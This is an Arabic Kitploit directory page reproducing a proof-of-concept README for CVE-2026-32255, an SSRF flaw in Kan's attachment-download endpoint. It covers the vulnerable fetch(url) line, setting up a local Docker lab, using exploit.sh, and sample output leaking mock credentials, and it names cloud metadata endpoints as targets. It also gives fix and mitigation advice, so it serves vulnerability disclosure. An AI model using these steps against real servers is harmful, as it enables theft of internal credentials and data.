Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/koadt/poc-cve-2026-32255
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubkoadt/poc-cve-2026-32255

poc-cve-2026-32255

يحتوي هذا المستودع على إثبات مفهوم (POC) لثغرة CVE-2026-32255، وهي ثغرة تزوير طلبات من جانب الخادم (SSRF) عالية الخطورة في Kan، وهي أداة مفتوحة المصدر لإدارة المشاريع.

عرض المستودع
2منذ 5 أشهرلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Kan SSRF عبر تنزيل المرفقات (CVE-2026-32255) - إثبات المفهوم

يحتوي هذا المستودع على إثبات المفهوم (POC) لثغرة CVE-2026-32255، وهي ثغرة تزوير الطلبات من جانب الخادم (SSRF) عالية الخطورة في Kan، وهي أداة مفتوحة المصدر لإدارة المشاريع.

تسمح نقطة النهاية المعرضة للخطر للمهاجمين غير المصادق عليهم بإجراء طلبات HTTP عشوائية من الخادم وقراءة الاستجابة الكاملة، مما يتيح الوصول إلى الخدمات الداخلية ونقاط نهاية البيانات الوصفية السحابية.

جدول المحتويات

  1. تفاصيل الثغرة
  2. تشغيل إثبات المفهوم
  3. استخدام سكربت الاستغلال
  4. كيفية إصلاح الثغرة
  5. إخلاء المسؤولية

تفاصيل الثغرة

معلومات CVE

  • معرف CVE: CVE-2026-32255
  • الإصدارات المتأثرة: Kan <= 0.5.4
  • الإصدار المُصلَح: 0.5.5
  • درجة CVSS: 8.6 (عالية)
  • متجه CVSS: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-918 (تزوير الطلبات من جانب الخادم)
  • الوصف

    يُعرّض الملف apps/web/src/pages/api/download/attatchment.ts نقطة نهاية GET /api/download/attatchment مصممة لوكيل تنزيلات المرفقات من تخزين S3. تقبل نقطة النهاية معامل url الذي يتحكم فيه المستخدم وتمرره مباشرة إلى fetch() من جانب الخادم دون أي تحقق أو مصادقة:

    root@kitploit:~
    const upstream = await fetch(url); // no validation on `url`
    

    يمكن للمهاجم توفير أي عنوان URL، مما يتسبب في قيام الخادم بإجراء طلب HTTP إلى هذا الوجهة وإرجاع نص الاستجابة الكامل إلى العميل. هذه ثغرة SSRF بقراءة كاملة (وليست عمياء)، مما يعني أن المهاجم يمكنه قراءة محتوى الاستجابة بالكامل.

    التأثير

    • الوصول إلى الخدمات الداخلية غير المعرضة للإنترنت
    • قراءة نقاط نهاية البيانات الوصفية السحابية (مثل http://169.254.169.254/ على AWS/GCP)
    • فحص المنافذ للشبكات الداخلية
    • تسريب البيانات الحساسة من واجهات برمجة التطبيقات الداخلية

    المراجع

    • NVD - CVE-2026-32255
    • GitHub Security Advisory - GHSA-qrx8-9hc6-jvqg
    • Fix Commit

    تشغيل إثبات المفهوم

    المتطلبات الأساسية

    • Docker و Docker Compose
    • Bash
    • curl

    الخطوة 1: تشغيل نسخة Kan معرضة للخطر

    استنسخ وقم بتشغيل Kan v0.5.4 (آخر إصدار معرض للخطر):

    root@kitploit:~
    git clone --branch v0.5.4 https://github.com/kanbn/kan.git
    cd kan
    

    قم بتكوين متغيرات البيئة المطلوبة:

    root@kitploit:~
    cat > .env <<'EOF'
    NEXT_PUBLIC_BASE_URL=http://localhost:3000
    BETTER_AUTH_SECRET=poc-secret-not-for-production-use
    POSTGRES_URL=postgresql://kan:kan@localhost:5432/kan_db
    POSTGRES_PASSWORD=kan
    REDIS_URL=redis://localhost:6379
    NEXT_PUBLIC_STORAGE_URL=http://localhost:9000
    EOF
    

    ملاحظة: إذا حصلت على خطأ بخصوص dokploy-network، قم بإزالة مراجع dokploy-network من docker-compose.yml (الأسطر 9، 130-131) ثم قم بتشغيل docker compose up -d مرة أخرى. هذه الشبكة غير مطلوبة محليًا.

    قم بتشغيل الحاويات:

    root@kitploit:~
    docker compose up -d
    

    يجب أن يكون التطبيق متاحًا على http://localhost:3000.

    الخطوة 2: تشغيل الخدمة الداخلية المحاكاة

    في محطة طرفية منفصلة، قم بتشغيل الخدمة الداخلية الوهمية المرفقة التي تحاكي واجهة برمجة تطبيقات داخلية حساسة:

    root@kitploit:~
    python3 internal-service.py
    

    يبدأ هذا خادمًا على المنفذ 8888 يعيد بيانات اعتماد وهمية، محاكيًا خدمة يجب أن تكون متاحة فقط من الشبكة الداخلية. في سيناريو واقعي، ستكون هذه الخدمة معزولة خلف جدار حماية ولا يمكن الوصول إليها من الخارج. تسمح ثغرة SSRF للمهاجم بالوصول إليها عبر الخادم.

    الخطوة 3: تشغيل الاستغلال

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh http://localhost:3000
    

    استخدام سكربت الاستغلال

    الاستخدام

    root@kitploit:~
    ./exploit.sh <target-url> [internal-url]
    
    • <target-url>: عنوان URL الأساسي لنسخة Kan (مثل http://localhost:3000)
    • [internal-url]: عنوان URL الداخلي للجلب عبر SSRF (اختياري، يتم اكتشافه تلقائيًا من بوابة جسر Docker)

    مثال

    root@kitploit:~
    ./exploit.sh http://localhost:3000
    
    root@kitploit:~
    === CVE-2026-32255 - Kan SSRF via Attachment Download ===
    Target: http://localhost:3000
    Internal URL: http://172.17.0.1:8888
    
    [*] Checking if endpoint is reachable...
    [+] Endpoint is reachable (HTTP 400)
    
    [*] Attempting SSRF to http://172.17.0.1:8888 ...
    [+] VULNERABLE - Server fetched internal resource
    
    Leaked content:
    ------------------------------------------------------------
    {
      "service": "internal-config-api",
      "credentials": {
        "db_host": "10.0.0.5",
        "db_user": "admin",
        "db_password": "s3cret_passw0rd!",
        "api_key": "sk-internal-4f8a2b1c9d3e7f6a5b0c8d2e1f4a7b3c"
      }
    }
    ------------------------------------------------------------
    

    كيفية إصلاح الثغرة

    تحديث Kan (موصى به)

    قم بالتحديث إلى Kan v0.5.5 أو أحدث، والذي يتحقق من معامل url مقابل اسم مضيف نقطة نهاية S3 المُكوَّن قبل توكيل الطلب.

    حل بديل: الحظر عند الوكيل العكسي

    إذا لم تتمكن من التحديث فورًا، قم بحظر الوصول الخارجي إلى نقطة النهاية المعرضة للخطر على مستوى الوكيل العكسي.


    إخلاء المسؤولية

    إثبات المفهوم هذا مقدم لأغراض تعليمية ولاختبارات الأمان المصرح بها فقط. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.

    المؤلف غير مسؤول عن أي إساءة استخدام للمعلومات أو الأدوات المقدمة في هذا المستودع. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.


    اكتشف بواسطة: kOaDT ([email protected])

    تنزيل الأداة